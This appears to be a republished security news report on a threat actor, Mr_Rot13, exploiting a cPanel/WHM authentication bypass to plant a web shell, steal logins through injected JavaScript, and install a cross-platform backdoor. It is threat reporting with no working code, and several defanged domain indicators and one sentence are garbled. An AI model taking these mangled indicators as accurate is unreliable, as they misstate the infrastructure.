A threat actor named Mr_Rot13 is believed to have exploited a recently revealed critical flaw in cPanel to deploy a backdoor codenamed Filemanager into compromised environments.
This attack exploits vulnerability CVE-2026-41940, which affects cPanel and WebHost Manager (WHM), resulting in an authentication bypass that could allow a remote attacker to gain advanced control of the control panel.
According to a new report from QiAnXin XLab, this security flaw has been exploited by many attackers since its disclosure late last month, resulting in malicious behavior such as cryptocurrency mining, ransomware, botnet propagation, and backdoor implantation.
“Surveillance data shows that over 2,000 source IPs worldwide are currently involved in automated attacks and cybercriminal activity targeting this vulnerability,” said XLab researchers. “These IPs are distributed across multiple regions around the world, primarily originating from regions such as Germany, the United States, Brazil, and the Netherlands.”
Further analysis of the ongoing exploit activity revealed that the Go-based infection program was deployed to a remote server (‘cp.dene.[de[.]com”) is designed to drop a PHP web shell that facilitates file upload/download and remote command execution, as well as embedding an SSH public key into a compromised cPanel system for persistent access.
A web shell is then used to inject JavaScript code to serve a customized login page to steal login credentials, which are then siphoned off to an attacker-controlled system encoded using ROT13 ciphers (‘wrned[.]Once the details are submitted, the attack chain culminates in the deployment of a cross-platform backdoor that can infect Windows, macOS, and Linux systems.
The infector also has the ability to collect sensitive information from compromised hosts, including bash history, SSH data, device information, database passwords, and cPanel virtual aliases (also known as varias) to a three-member Telegram group created by a user named “0xWR.”
In the infection sequence analyzed by XLab, the file manager is delivered via a shell script downloaded from ‘wpsock’.[.]com” domain. The backdoor supports file management, remote command execution, and shell functionality.
There are indications that the threat actors behind this operation have been operating quietly in the shadows for years. This assessment is based on the fact that a command and control (C2) domain embedded in the JavaScript code is used in a PHP-based backdoor (“helper.php”) uploaded to the VirusTotal platform in April 2022. This domain was first registered in October 2020.
“For six years from 2020 to date, the detection rate of Mr_Rot13’s related samples and infrastructure across security products remains extremely low,” XLab said.
Source link
